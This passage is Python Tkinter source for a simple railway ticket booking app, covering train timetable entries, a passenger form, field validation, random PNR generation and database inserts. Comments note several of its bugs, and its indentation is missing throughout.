e10.insert(10, "Howrah")
e11.insert(10, "6:30")
e12.insert(10, "Gaya")
e13.insert(10, "18:20")
e14.insert(10, "1A,2A,3A")
en15.insert(10, "12272")
e16.insert(10, "Raftaar Express")
e17.insert(10, "Howrah")
e18.insert(10, "14:30")
e19.insert(10, "Gaya")
e20.insert(10, "23:30")
e21.insert(10, "1A,2A,3A")
en22.insert(10, "12273")
e23.insert(10, "Bodh Gaya Express")
e24.insert(10, "Howrah")
e25.insert(10, "12:30")
e26.insert(10, "Gaya")
e27.insert(10, "8:40")
e28.insert(10, "1A,2A,3A")
en29.insert(10, "12274")
e30.insert(10, "Durrani Express")
e31.insert(10, "Howrah")
e32.insert(10, "8:30")
e33.insert(10, "Gaya")
e34.insert(10, "16:20")
e35.insert(10, "1A,2A,3A")
if variable.get() == "Lucknow" and variable1.get()== "Patna":
en8.insert(10, "12275")
e9.insert(10, "Lucknow Patna Rath")
e10.insert(10, "Lucknow")
e11.insert(10, "9:30")
e12.insert(10, "Patna")
e13.insert(10, "14:40")
e14.insert(10, "1A,2A,3A")
en15.insert(10, "12276")
e16.insert(10, "Lucknow Bengal Rath")
e17.insert(10, "Lucknow")
e18.insert(10, "1:00")
e19.insert(10, "Patna")
e20.insert(10, "00:45")
e21.insert(10, "1A,2A")
en22.insert(10, "12277")
e23.insert(10, "Sandhya Express")
e24.insert(10, "Lucknow")
e25.insert(10, "11:05")
e26.insert(10, "Patna")
e27.insert(10, "3:00")
e28.insert(10, "1A,2A")
en29.insert(10, "12278")
e30.insert(10, "Nehru Express")
e31.insert(10, "Lucknow")
e32.insert(10, "14:05")
e33.insert(10, "Patna")
e34.insert(10, "6:45")
e35.insert(10, "1A,2A")
if variable.get() == "Lucknow" and variable1.get()== "Gaya":
en8.insert(10, "12279")
e9.insert(10, "Paschim UP Express")
e10.insert(10, "Lucknow")
e11.insert(10, "1:40")
e12.insert(10, "Gaya")
e13.insert(10, "10:40")
e14.insert(10, "1A,2A")
en15.insert(10, "12280")
e16.insert(10, "Raniganj Express")
e17.insert(10, "Lucknow")
e18.insert(10, "6:30")
e19.insert(10, "Gaya")
e20.insert(10, "10:45")
e21.insert(10, "1A,2A")
en22.insert(10, "12281")
e23.insert(10, "Spark Express")
e24.insert(10, "Lucknow")
e25.insert(10, "11:05")
e26.insert(10, "Gaya")
e27.insert(10, "20:00")
e28.insert(10, "1A,2A")
en29.insert(10, "12282")
e30.insert(10, "Chambal Express")
e31.insert(10, "Lucknow")
e32.insert(10, "12:10")
e33.insert(10, "Gaya")
e34.insert(10, "21:10")
e35.insert(10, "1A,2A")
if variable.get() == "Ranchi" and variable1.get()== "Patna":
en8.insert(10, "12283")
e9.insert(10, "Jan Satabdi Express")
e10.insert(10, "Ranchi")
e11.insert(10, "13:30")
e12.insert(10, "Patna")
e13.insert(10, "7:55")
e14.insert(10, "1A,2A,3A")
en15.insert(10, "12284")
e16.insert(10, "Ranchi Juntion")
e17.insert(10, "Ranchi")
e18.insert(10, "16:30")
e19.insert(10, "Patna")
e20.insert(10, "5:50")
e21.insert(10, "1A,2A,3A")
en22.insert(10, "12285")
e23.insert(10, "Danapur Cantt Exp.")
e24.insert(10, "Ranchi")
e25.insert(10, "8:35")
e26.insert(10, "Patna")
e27.insert(10, "15:50")
e28.insert(10, "1A,2A,3A")
en29.insert(10, "12286")
e30.insert(10, "Bokaro Express")
e31.insert(10, "Ranchi")
e32.insert(10, "12:30")
e33.insert(10, "Patna")
e34.insert(10, "7:20")
e35.insert(10, "1A,2A,3A")
if variable.get() == "Ranchi" and variable1.get()== "Gaya":
en8.insert(10, "12287")
e9.insert(10, "Ranchi-Chapra Express")
e10.insert(10, "Ranchi")
e11.insert(10, "6:30")
e12.insert(10, "Gaya")
e13.insert(10, "18:20")
e14.insert(10, "1A,2A,3A")
en15.insert(10, "12288")
e16.insert(10, "Jahanabad Rath")
e17.insert(10, "Ranchi")
e18.insert(10, "14:30")
e19.insert(10, "Gaya")
e20.insert(10, "23:30")
e21.insert(10, "1A,2A,3A")
en22.insert(10, "12289")
e23.insert(10, "Rana Express")
e24.insert(10, "Ranchi")
e25.insert(10, "12:30")
e26.insert(10, "Gaya")
e27.insert(10, "8:40")
e28.insert(10, "1A,2A,3A")
en29.insert(10, "12290")
e30.insert(10, "Anuvaad Express")
e31.insert(10, "Ranchi")
e32.insert(10, "8:30")
e33.insert(10, "Gaya")
e34.insert(10, "16:20")
e35.insert(10, "1A,2A,3A")
if variable.get() == "Hatia" and variable1.get()== "New Delhi":
en8.insert(10, "12291")
e9.insert(10, "Jannrath")
e10.insert(10, "Hatia")
e11.insert(10, "9:30")
e12.insert(10, "New Delhi")
e13.insert(10, "14:40")
e14.insert(10, "1A,2A")
en15.insert(10, "12292")
e16.insert(10, "Hatia Delhi Express")
e17.insert(10, "Hatia")
e18.insert(10, "1:00")
e19.insert(10, "New Delhi")
e20.insert(10, "00:45")
e21.insert(10, "1A,2A")
en22.insert(10, "12293")
e23.insert(10, "Rajdhani Express")
e24.insert(10, "Hatia")
e25.insert(10, "11:05")
e26.insert(10, "New Delhi")
e27.insert(10, "3:00")
e28.insert(10, "1A,2A")
en29.insert(10, "12294")
e30.insert(10, "Gorakhpur Express")
e31.insert(10, "Hatia")
e32.insert(10, "14:05")
e33.insert(10, "New Delhi")
e34.insert(10, "6:45")
e35.insert(10, "1A,2A")
if variable.get() == "Hatia" and variable1.get()== "Chandigarh":
en8.insert(10, "12295")
e9.insert(10, "Chambal Express")
e10.insert(10, "Hatia")
e11.insert(10, "1:40")
e12.insert(10, "Chandigarh")
e13.insert(10, "10:40")
e14.insert(10, "1A,2A")
en15.insert(10, "12296")
e16.insert(10, "Yuvraj Express")
e17.insert(10, "Hatia")
e18.insert(10, "6:30")
e19.insert(10, "Chandigarh")
e20.insert(10, "10:45")
e21.insert(10, "1A,2A")
en22.insert(10, "12297")
e23.insert(10, "Chandigarh Hatia link Express")
e24.insert(10, "Hatia")
e25.insert(10, "11:05")
e26.insert(10, "Chandigarh")
e27.insert(10, "20:00")
e28.insert(10, "1A,2A")
en29.insert(10, "12298")
e30.insert(10, "Rajdhani Express")
e31.insert(10, "Hatia")
e32.insert(10, "12:10")
e33.insert(10, "Chandigarh")
e34.insert(10, "21:10")
e35.insert(10, "1A,2A")
def PassengerDetails1():
global x1
if en8.get()=="12235":
x1=12235
elif en8.get()=="12239":
x1=12239
elif en8.get() == "12243":
x1 = 12243
else:
x1 = 12247  # fallback when the first listed train is not one of the known numbers
def PassengerDetails():
window1.destroy()
window2 = Toplevel(master)
window2.title("Passenger Details")
window2.config(bg="indianred2")
screen_width = window2.winfo_screenwidth()
screen_height = window2.winfo_screenheight()
width = 1020
height = 700
x = (screen_width / 2) - (width / 2)
y = (screen_height / 2) - (height / 2)
window2.geometry('%dx%d+%d+%d' % (width, height, x, y))
# Build the 5x5 passenger grid of Entry widgets once; each widget below has a fixed grid position.
e1 = Entry(window2, justify="center", font=('Britannic Bold', 13), bg="lightpink3",fg="blue4")
enn2 = Entry(window2, justify="center", font=('Britannic Bold', 13), bg="lightpink3",fg="blue4")
enn3 = Entry(window2, justify="center", font=('Britannic Bold', 13), bg="lightpink3",fg="blue4")
enn4 = Entry(window2, justify="center", font=('Britannic Bold', 13), bg="lightpink3",fg="blue4")
e5 = Entry(window2, justify="center", font=('Britannic Bold', 13), bg="lightpink3",fg="blue4")
e6 = Entry(window2, justify="center", font=('Rockwell Condensed', 11), bg="steelblue3")
enn7 = Entry(window2, justify="center", font=('Rockwell Condensed', 11), bg="steelblue3")
enn8 = Entry(window2, justify="center", font=('Rockwell Condensed', 11), bg="steelblue3")
enn9 = Entry(window2, justify="center", font=('Rockwell Condensed', 5))
e10 = Entry(window2, justify="center", font=('Rockwell Condensed', 5))
e11 = Entry(window2, justify="center", font=('Rockwell Condensed', 11), bg="steelblue3")
e12 = Entry(window2, justify="center", font=('Rockwell Condensed', 11), bg="steelblue3")
e13 = Entry(window2, justify="center", font=('Rockwell Condensed', 11), bg="steelblue3")
e14 = Entry(window2, justify="center", font=('Rockwell Condensed', 5))
e15 = Entry(window2, justify="center", font=('Rockwell Condensed', 5))
e16 = Entry(window2, justify="center", font=('Rockwell Condensed', 11), bg="steelblue3")
e17 = Entry(window2, justify="center", font=('Rockwell Condensed', 11), bg="steelblue3")
e18 = Entry(window2, justify="center", font=('Rockwell Condensed', 11), bg="steelblue3")
e19 = Entry(window2, justify="center", font=('Rockwell Condensed', 5))
e20 = Entry(window2, justify="center", font=('Rockwell Condensed', 5))
e21 = Entry(window2, justify="center", font=('Rockwell Condensed', 11), bg="steelblue3")
e22 = Entry(window2, justify="center", font=('Rockwell Condensed', 11), bg="steelblue3")
e23 = Entry(window2, justify="center", font=('Rockwell Condensed', 11), bg="steelblue3")
e24 = Entry(window2, justify="center", font=('Rockwell Condensed', 5))
e25 = Entry(window2, justify="center", font=('Rockwell Condensed', 5))
e1.insert(10, "S.no")
enn2.insert(10, "Name")
enn3.insert(10, "Age")
enn4.insert(10, "Gender")
e5.insert(10, "Id_Proof")
e6.insert(10, "1.")
e11.insert(10, "2.")
e16.insert(10, "3.")
e21.insert(10, "4.")
e1.grid(row=0, column=0)
enn2.grid(row=0, column=1)
enn3.grid(row=0, column=2)
enn4.grid(row=0, column=3)
e5.grid(row=0, column=4)
e6.grid(row=1, column=0)
enn7.grid(row=1, column=1)
enn8.grid(row=1, column=2)
enn9.grid(row=1, column=3)
e10.grid(row=1, column=4)
e11.grid(row=2, column=0)
e12.grid(row=2, column=1)
e13.grid(row=2, column=2)
e14.grid(row=2, column=3)
e15.grid(row=2, column=4)
e16.grid(row=3, column=0)
e17.grid(row=3, column=1)
e18.grid(row=3, column=2)
e19.grid(row=3, column=3)
e20.grid(row=3, column=4)
e21.grid(row=4, column=0)
e22.grid(row=4, column=1)
e23.grid(row=4, column=2)
e24.grid(row=4, column=3)
e25.grid(row=4, column=4)
def fun(*args):
enn9.delete(0, END)  # clear before inserting so repeated choices don't concatenate
enn9.insert(10, v2.get())
def fun1(*args):
e14.delete(0, END)
e14.insert(10, v3.get())
def fun2(*args):
e19.delete(0, END)
e19.insert(10, v4.get())
def fun3(*args):
e24.delete(0, END)
e24.insert(10, v5.get())
def fun4(*args):
e10.delete(0, END)
e10.insert(10, v6.get())
def fun5(*args):
e15.delete(0, END)
e15.insert(10, v7.get())
def fun6(*args):
e20.delete(0, END)
e20.insert(10, v8.get())
def fun7(*args):
e25.delete(0, END)
e25.insert(10, v9.get())
v2 = StringVar(window2)
gender = {'Male', 'Female'}
v2.set('Choose')
v2.trace("w", fun)
popupMenu1 = OptionMenu(window2, v2, *gender)
popupMenu1.config(font=('Calisto MT', 10), bg="darkgoldenrod3", fg='white')
popupMenu1.grid(row=1, column=3)
v3 = StringVar(window2)
gender1 = {'Male', 'Female'}
v3.set('Choose')
v3.trace("w", fun1)
popupMenu2 = OptionMenu(window2, v3, *gender1)
popupMenu2.config(font=('Calisto MT', 10), bg="darkgoldenrod3", fg='white')
popupMenu2.grid(row=2, column=3)
v4 = StringVar(window2)
gender2 = {'Male', 'Female'}
v4.set('Choose')
v4.trace("w", fun2)
popupMenu3 = OptionMenu(window2, v4, *gender2)
popupMenu3.config(font=('Calisto MT', 10), bg="darkgoldenrod3", fg='white')
popupMenu3.grid(row=3, column=3)
v5 = StringVar(window2)
gender = {'Male', 'Female'}
v5.set('Choose')
v5.trace("w", fun3)
popupMenu4 = OptionMenu(window2, v5, *gender)
popupMenu4.config(font=('Calisto MT', 10), bg="darkgoldenrod3", fg='white')
popupMenu4.grid(row=4, column=3)
v6 = StringVar(window2)
proof = {'Aadhar card', 'Pan card'}
v6.set('Choose')
v6.trace("w", fun4)
popup = OptionMenu(window2, v6, *proof)
popup.config(font=('Calisto MT', 10), bg="light green")
popup.grid(row=1, column=4)
v7 = StringVar(window2)
proof = {'Aadhar card', 'Pan card'}
v7.set('Choose')
v7.trace("w", fun5)
popup = OptionMenu(window2, v7, *proof)
popup.config(font=('Calisto MT', 10), bg="light green")
popup.grid(row=2, column=4)
v8 = StringVar(window2)
proof = {'Aadhar card', 'Pan card'}
v8.set('Choose')
v8.trace("w", fun6)
popup = OptionMenu(window2, v8, *proof)
popup.config(font=('Calisto MT', 10), bg="light green")
popup.grid(row=3, column=4)
v9 = StringVar(window2)
proof = {'Aadhar card', 'Pan card'}
v9.set('Choose')
v9.trace("w", fun7)
popup = OptionMenu(window2, v9, *proof)
popup.config(font=('Calisto MT', 10), bg="light green")
popup.grid(row=4, column=4)
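# The four gender menus and four id-proof menus above differ only in row,
# column and styling. A minimal sketch (an assumption, omitting the trace
# callbacks that copy the choice into the grid) of building one column of
# menus in a loop:
def make_option_column(parent, column, choices, rows=(1, 2, 3, 4), **style):
menu_vars = []
for row in rows:
var = StringVar(parent)
var.set('Choose')
menu = OptionMenu(parent, var, *choices)
menu.config(**style)
menu.grid(row=row, column=column)
menu_vars.append(var)
return menu_vars
# e.g. genders = make_option_column(window2, 3, ('Male', 'Female'),
# font=('Calisto MT', 10), bg="darkgoldenrod3", fg='white')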
def Check1():
def Show():
global x1,count
window3 = Toplevel(master)
window3.title("Ticket")
screen_width = window3.winfo_screenwidth()
screen_height = window3.winfo_screenheight()
width = 780
height = 480
x = (screen_width / 2) - (width / 2)
y = (screen_height / 2) - (height / 2)
window3.geometry('%dx%d+%d+%d' % (width, height, x, y))
window3.config(bg='gray23')
Label(window3, text="Name:",bg='dark turquoise', font=('Tempus Sans ITC', 11,'bold')).place(x=90, y=50)
Label(window3, text="Gender:",bg='dark turquoise', font=('Tempus Sans ITC', 11,'bold')).place(x=320, y=50)
Label(window3, text="Departure time:",bg='dark turquoise', font=('Tempus Sans ITC', 11,'bold')).place(x=90, y=90)
Label(window3, text="Age:",bg='dark turquoise', font=('Tempus Sans ITC', 11,'bold')).place(x=320, y=90)
Label(window3, text="Class:",bg='dark turquoise', font=('Tempus Sans ITC', 11,'bold')).place(x=320, y=130)
Label(window3, text="Train no.:",bg='dark turquoise',font=('Tempus Sans ITC', 11,'bold')).place(x=90, y=130)
Label(window3, text="Train name:",bg='dark turquoise', font=('Tempus Sans ITC', 11,'bold')).place(x=90, y=170)
Label(window3, text="Source:",bg='dark turquoise', font=('Tempus Sans ITC', 11,'bold')).place(x=90, y=210)
Label(window3, text="Destination:",bg='dark turquoise', font=('Tempus Sans ITC', 11,'bold')).place(x=90, y=250)
Label(window3, text="No. of tickets:",bg='dark turquoise', font=('Tempus Sans ITC', 11,'bold')).place(x=90, y=290)
Label(window3, text="PNR no.:",bg='dark turquoise', font=('Tempus Sans ITC', 11,'bold')).place(x=320, y=170)
Number = Label(window3, justify="center",bg='white',text=count, font=('Slab Serif', 10)).place(x=170, y=290, height=25)
Class = Label(window3, justify="center",bg='white',text=variable2.get(), font=('Slab Serif', 10)).place(x=380, y=130, height=25)
TrainNumber = Label(window3, justify="center",bg='white', font=('Slab Serif', 10))
TrainNumber.place(x=170, y=130, height=25)
global conn, cursor, x1, x2
if x1 == 12235:
cursor = conn.cursor()
TrainNumber.config(text=x1)
cursor.execute("Select * from Rail88 where Trainnumber=12235")
fetch = cursor.fetchall()
for data in fetch:
Source = Label(window3, text=data[5],bg='white', justify="center", font=('Slab Serif', 9)).place(  # data indices aligned with the other train branches
x=170, y=170, height=25)
Destination = Label(window3, text=data[2],bg='white', justify="center",
font=('Slab Serif', 10)).place(x=180, y=250, height=25)
TrainName = Label(window3, text=data[1],bg='white', justify="center",
font=('Slab Serif', 10)).place(x=180, y=210, height=25)
DepartureTime = Label(window3, text=data[3],bg='white', justify="center",
font=('Slab Serif', 10)).place(x=210, y=90, height=25)
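# A 6-digit PNR is drawn uniformly at random; collisions with PNRs already in
# Rail999 are not checked. Note the VALUES tuple below is (pnr, name, age,
# gender) while the column list reads (pnr, Name, Gender, Age); the display
# code reads data[2] for Age and data[3] for Gender with the same swap, so
# the ticket still renders the right values.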
a=111111
b=999999
pnr=(random.randint(a, b))
cursor.execute("Insert into Rail999 (pnr,Name,Gender,Age) values (?,?,?,?)",
(pnr, str(enn7.get()),int(enn8.get()), str(enn9.get())))
conn.commit()
cursor.execute("Select * from Rail999 where pnr=? ",(pnr,))
fetch1 = cursor.fetchall()
for data in fetch1:
pnr1 = Label(window3, justify="center",bg='white',text=data[0],
font=('Slab Serif', 9))
pnr1.place(x=380, y=170, height=25)
pnr1.config(text=data[0])
Name = Label(window3,text=data[1],bg='white', justify="center", font=('Slab Serif', 9)).place(x=170, y=50,height=25)
Age = Label(window3,text=data[2],bg='white', justify="center", font=('Slab Serif', 9)).place(x=380, y=90, height=25)
Gender = Label(window3,text=data[3] ,bg='white',justify="center", font=('Slab Serif', 9)).place(x=380, y=50, height=25)
cursor.close()
conn.close()
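# conn.close() here means a second booking in the same session will fail:
# the module-level connection is not reopened anywhere in the code shown here.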
elif x1 == 12239:
cursor = conn.cursor()
TrainNumber.config(text=x1)
cursor.execute("Select * from Rail88 where Trainnumber=12239")
fetch = cursor.fetchall()
for data in fetch:
Source = Label(window3, text=data[5],bg='white', justify="center", font=('Slab Serif', 10)).place(  # data indices aligned with the other train branches
x=170, y=170, height=25)
Destination = Label(window3, text=data[2], justify="center",bg='white',
font=('Slab Serif', 10)).place(x=180, y=250, height=25)
TrainName = Label(window3, text=data[1], justify="center",bg='white',
font=('Slab Serif', 10)).place(x=180, y=210, height=25)
DepartureTime = Label(window3, text=data[3], justify="center",bg='white',
font=('Slab Serif', 10)).place(x=210, y=90, height=25)
a = 111111
b = 999999
pnr = (random.randint(a, b))
cursor.execute("Insert into Rail999 (pnr,Name,Gender,Age) values (?,?,?,?)",
(pnr, str(enn7.get()), int(enn8.get()), str(enn9.get())))
conn.commit()
cursor.execute("Select * from Rail999 where pnr=? ", (pnr,))
fetch1 = cursor.fetchall()
for data in fetch1:
pnr1 = Label(window3, justify="center", text=data[0],bg='white',
font=('Slab Serif', 9))
pnr1.place(x=380, y=170, height=25)
pnr1.config(text=data[0])
Name = Label(window3, text=data[1], justify="center",bg='white', font=('Slab Serif', 9)).place(
x=170, y=50, height=25)
Age = Label(window3, text=data[2], justify="center",bg='white', font=('Slab Serif', 9)).place(
x=380, y=90, height=25)
Gender = Label(window3, text=data[3], justify="center",bg='white', font=('Slab Serif', 9)).place(
x=380, y=50, height=25)
cursor.close()
conn.close()
elif x1 == 12243:
cursor = conn.cursor()
TrainNumber.config(text=x1)
cursor.execute("Select * from Rail88 where Trainnumber=12243")
fetch = cursor.fetchall()
for data in fetch:
Source = Label(window3, text=data[5],bg='white', justify="center", font=('Slab Serif', 10)).place(
x=170, y=170, height=25)
Destination = Label(window3, text=data[2],bg='white', justify="center",
font=('Slab Serif', 10)).place(x=180, y=250, height=25)
TrainName = Label(window3, text=data[1],bg='white', justify="center",
font=('Slab Serif', 10)).place(x=180, y=210, height=25)
DepartureTime = Label(window3, text=data[3], justify="center",bg='white',
font=('Slab Serif', 10)).place(x=210, y=90, height=25)
a = 111111
b = 999999
pnr = (random.randint(a, b))
cursor.execute("Insert into Rail999 (pnr,Name,Gender,Age) values (?,?,?,?)",
(pnr, str(enn7.get()), int(enn8.get()), str(enn9.get())))
conn.commit()
cursor.execute("Select * from Rail999 where pnr=? ", (pnr,))
fetch1 = cursor.fetchall()
for data in fetch1:
pnr1 = Label(window3, justify="center",bg='white',text=data[0],
font=('Slab Serif', 9))
pnr1.place(x=380, y=170, height=25)
pnr1.config(text=data[0])
Name = Label(window3, text=data[1], justify="center",bg='white', font=('Slab Serif', 9)).place(
x=170, y=50, height=25)
Age = Label(window3, text=data[2], justify="center",bg='white', font=('Slab Serif', 9)).place(
x=380, y=90, height=25)
Gender = Label(window3, text=data[3], justify="center",bg='white', font=('Slab Serif', 9)).place(
x=380, y=50, height=25)
cursor.close()
conn.close()
elif x1 == 12247:
cursor = conn.cursor()
TrainNumber.config(text=x1)
cursor.execute("Select * from Rail88 where Trainnumber=12247")
fetch = cursor.fetchall()
for data in fetch:
Source = Label(window3, text=data[5], justify="center",bg='white', font=('Slab Serif', 10)).place(
x=170, y=170, height=25)
Destination = Label(window3, text=data[2], justify="center",bg='white',
font=('Slab Serif', 10)).place(x=180, y=250, height=25)
TrainName = Label(window3, text=data[1], justify="center",bg='white',
font=('Slab Serif', 10)).place(x=180, y=210, height=25)
DepartureTime = Label(window3, text=data[3], justify="center",bg='white',
font=('Slab Serif', 10)).place(x=210, y=90, height=25)
a = 111111
b = 999999
pnr = (random.randint(a, b))
cursor.execute("Insert into Rail999 (pnr,Name,Gender,Age) values (?,?,?,?)",
(pnr, str(enn7.get()), int(enn8.get()), str(enn9.get())))
conn.commit()
cursor.execute("Select * from Rail999 where pnr=? ", (pnr,))
fetch1 = cursor.fetchall()
for data in fetch1:
pnr1 = Label(window3, justify="center",bg='white', text=data[0],
font=('Slab Serif', 9))
pnr1.place(x=380, y=170, height=25)
pnr1.config(text=data[0])
Name = Label(window3, text=data[1],bg='white', justify="center", font=('Slab Serif', 9)).place(
x=170, y=50, height=25)
Age = Label(window3, text=data[2],bg='white', justify="center", font=('Slab Serif', 9)).place(
x=380, y=90, height=25)
Gender = Label(window3, text=data[3],bg='white', justify="center", font=('Slab Serif', 9)).place(
x=380, y=50, height=25)
cursor.close()
conn.close()
Label(window3, text="Have a happy & safe Journey!!",bg='white',fg='orange red',font=('Comic Sans MS', 23,'bold')).place(x=200, y=340)
mainloop()
global count
count=0
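# Validation: the lead passenger row (enn7-e10) is mandatory; every further
# row must be either completely filled or completely empty, and rows cannot
# be skipped (e.g. row 4 filled while row 3 is empty is rejected). When the
# checks pass, `count` becomes the number of completed rows.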
if len(enn7.get()) == 0 or len(enn8.get()) == 0 or len(enn9.get()) == 0 or len(e10.get()) == 0:
tkinter.messagebox.showinfo('Error', 'enter all required fields')
elif len(e12.get()) != 0 and (len(e13.get()) == 0 or len(e14.get()) == 0 or len(e15.get()) == 0):
tkinter.messagebox.showinfo('Error', 'enter all required fields')
elif len(e17.get()) != 0 and (len(e18.get()) == 0 or len(e19.get()) == 0 or len(e20.get()) == 0):
tkinter.messagebox.showinfo('Error', 'enter all required fields')
elif len(e22.get()) != 0 and (len(e23.get()) == 0 or len(e24.get()) == 0 or len(e25.get()) == 0):
tkinter.messagebox.showinfo('Error', 'enter all required fields')
elif (len(e12.get()) != 0 or len(e13.get()) != 0 or len(e14.get()) != 0 or len(
e15.get()) != 0) and (
len(e22.get()) != 0 or len(e23.get()) != 0 or len(e24.get()) != 0 or len(
e25.get()) != 0) and (
len(e17.get()) == 0 or (len(e18.get()) == 0 or len(e19.get()) == 0 or len(e20.get()) == 0)):
tkinter.messagebox.showinfo('Error', 'enter all required fields')
elif (len(enn7.get()) != 0 or len(enn8.get()) != 0 or len(enn9.get()) != 0 or len(
e10.get()) != 0) and (
len(e17.get()) != 0 or len(e18.get()) != 0 or len(e19.get()) != 0 or len(
e20.get()) != 0) and (
len(e12.get()) == 0 or (len(e13.get()) == 0 or len(e14.get()) == 0 or len(e15.get()) == 0)):
tkinter.messagebox.showinfo('Error', 'enter all required fields')
elif enn7.get()!="" and e12.get()=="" and e17.get()=="" and e22.get()=="":
count=1
Show()
elif e12.get()!="" and e17.get()=="":
count=2
Show()
elif e17.get()!="" and e22.get()=="":
count=3
Show()
elif e22.get()!="":
count=4
Show()
else:
Show()
b = Button(window2, text='Proceed', bg="slategray3", font=('Britannic Bold', 16), command=Check1)
b.place(x=450, y=255)
mainloop()
PassengerDetails()
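# PassengerDetails2/3/4 below repeat this window almost verbatim, and every
# Show() repeats the same query/insert/display block once per train number.
# A minimal sketch of a shared helper, assuming the Rail88 row layout used by
# most branches (data[1] -> the y=210 row, data[2]=destination,
# data[3]=departure, data[5] -> the y=170 row) and the existing global
# `conn`; illustrative only, not wired into the code below:
#
#     def book_ticket(train_number, name, age, gender):
#         cur = conn.cursor()
#         cur.execute("Select * from Rail88 where Trainnumber=?", (train_number,))
#         row = cur.fetchone()
#         pnr = random.randint(111111, 999999)
#         # column/value order kept exactly as in the existing inserts
#         cur.execute("Insert into Rail999 (pnr,Name,Gender,Age) values (?,?,?,?)",
#                     (pnr, name, age, gender))
#         conn.commit()
#         return pnr, row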
def PassengerDetails2():
global x1
if en15.get()=="12236":
x1=12236
elif en15.get()=="12240":
x1=12240
elif en15.get() == "12244":
x1 = 12244
else:
x1 = 12248
def PassengerDetails():
window1.destroy()
window2 = Toplevel(master)
window2.title("Passenger Details")
window2.config(bg="indianred2")
screen_width = window2.winfo_screenwidth()
screen_height = window2.winfo_screenheight()
width = 1020
height = 700
x = (screen_width / 2) - (width / 2)
y = (screen_height / 2) - (height / 2)
window2.geometry('%dx%d+%d+%d' % (width, height, x, y))
height = 5
width = 5
for i in range(height): # Rows
for j in range(width): # Columns
e1 = Entry(window2, justify="center", font=('Britannic Bold', 13), bg="lightpink3",fg="blue4")
enn2 = Entry(window2, justify="center", font=('Britannic Bold', 13), bg="lightpink3",fg="blue4")
enn3 = Entry(window2, justify="center", font=('Britannic Bold', 13), bg="lightpink3",fg="blue4")
enn4 = Entry(window2, justify="center", font=('Britannic Bold', 13), bg="lightpink3",fg="blue4")
e5 = Entry(window2, justify="center", font=('Britannic Bold', 13), bg="lightpink3",fg="blue4")
e6 = Entry(window2, justify="center", font=('Rockwell Condensed', 11), bg="steelblue3")
enn7 = Entry(window2, justify="center", font=('Rockwell Condensed', 11), bg="steelblue3")
enn8 = Entry(window2, justify="center", font=('Rockwell Condensed', 11), bg="steelblue3")
enn9 = Entry(window2, justify="center", font=('Rockwell Condensed', 5))
e10 = Entry(window2, justify="center", font=('Rockwell Condensed', 5))
e11 = Entry(window2, justify="center", font=('Rockwell Condensed', 11), bg="steelblue3")
e12 = Entry(window2, justify="center", font=('Rockwell Condensed', 11), bg="steelblue3")
e13 = Entry(window2, justify="center", font=('Rockwell Condensed', 11), bg="steelblue3")
e14 = Entry(window2, justify="center", font=('Rockwell Condensed', 5))
e15 = Entry(window2, justify="center", font=('Rockwell Condensed', 5))
e16 = Entry(window2, justify="center", font=('Rockwell Condensed', 11), bg="steelblue3")
e17 = Entry(window2, justify="center", font=('Rockwell Condensed', 11), bg="steelblue3")
e18 = Entry(window2, justify="center", font=('Rockwell Condensed', 11), bg="steelblue3")
e19 = Entry(window2, justify="center", font=('Rockwell Condensed', 5))
e20 = Entry(window2, justify="center", font=('Rockwell Condensed', 5))
e21 = Entry(window2, justify="center", font=('Rockwell Condensed', 11), bg="steelblue3")
e22 = Entry(window2, justify="center", font=('Rockwell Condensed', 11), bg="steelblue3")
e23 = Entry(window2, justify="center", font=('Rockwell Condensed', 11), bg="steelblue3")
e24 = Entry(window2, justify="center", font=('Rockwell Condensed', 5))
e25 = Entry(window2, justify="center", font=('Rockwell Condensed', 5))
e1.insert(10, "S.no")
enn2.insert(10, "Name")
enn3.insert(10, "Age")
enn4.insert(10, "Gender")
e5.insert(10, "Id_Proof")
e6.insert(10, "1")
e11.insert(10, "2")
e16.insert(10, "3")
e21.insert(10, "4")
e1.grid(row=0, column=0)
enn2.grid(row=0, column=1)
enn3.grid(row=0, column=2)
enn4.grid(row=0, column=3)
e5.grid(row=0, column=4)
e6.grid(row=1, column=0)
enn7.grid(row=1, column=1)
enn8.grid(row=1, column=2)
enn9.grid(row=1, column=3)
e10.grid(row=1, column=4)
e11.grid(row=2, column=0)
e12.grid(row=2, column=1)
e13.grid(row=2, column=2)
e14.grid(row=2, column=3)
e15.grid(row=2, column=4)
e16.grid(row=3, column=0)
e17.grid(row=3, column=1)
e18.grid(row=3, column=2)
e19.grid(row=3, column=3)
e20.grid(row=3, column=4)
e21.grid(row=4, column=0)
e22.grid(row=4, column=1)
e23.grid(row=4, column=2)
e24.grid(row=4, column=3)
e25.grid(row=4, column=4)
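# The 25 entries above form a 5x5 grid used as a table: row 0 is the header
# (S.no / Name / Age / Gender / Id_Proof) and rows 1-4 are passenger rows.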
def fun(*args):
enn9.insert(10, v2.get())
def fun1(*args):
e14.insert(10, v3.get())
def fun2(*args):
e19.insert(10, v4.get())
def fun3(*args):
e24.insert(10, v5.get())
def fun4(*args):
e10.insert(10, v6.get())
def fun5(*args):
e15.insert(10, v7.get())
def fun6(*args):
e20.insert(10, v8.get())
def fun7(*args):
e25.insert(10, v9.get())
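# Each StringVar below is traced so that picking an OptionMenu value copies it
# into the matching Gender/Id_Proof entry. trace("w") fires on every write and
# Entry.insert() appends rather than replaces, so re-picking a value appends a
# second copy into the entry instead of overwriting the first.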
v2 = StringVar(window2)
gender = {'Male', 'Female'}
v2.set('Choose')
v2.trace("w", fun)
popupMenu1 = OptionMenu(window2, v2, *gender)
popupMenu1.config(font=('Calisto MT', 10), bg="darkgoldenrod3", fg='white')
popupMenu1.grid(row=1, column=3)
v3 = StringVar(window2)
gender1 = {'Male', 'Female'}
v3.set('Choose')
v3.trace("w", fun1)
popupMenu2 = OptionMenu(window2, v3, *gender1)
popupMenu2.config(font=('Calisto MT', 10), bg="darkgoldenrod3", fg='white')
popupMenu2.grid(row=2, column=3)
v4 = StringVar(window2)
gender2 = {'Male', 'Female'}
v4.set('Choose')
v4.trace("w", fun2)
popupMenu3 = OptionMenu(window2, v4, *gender2)
popupMenu3.config(font=('Calisto MT', 10), bg="darkgoldenrod3", fg='white')
popupMenu3.grid(row=3, column=3)
v5 = StringVar(window2)
gender = {'Male', 'Female'}
v5.set('Choose')
v5.trace("w", fun3)
popupMenu4 = OptionMenu(window2, v5, *gender)
popupMenu4.config(font=('Calisto MT', 10), bg="darkgoldenrod3", fg='white')
popupMenu4.grid(row=4, column=3)
v6 = StringVar(window2)
proof = {'Aadhar card', 'Pan card'}
v6.set('Choose')
v6.trace("w", fun4)
popup = OptionMenu(window2, v6, *proof)
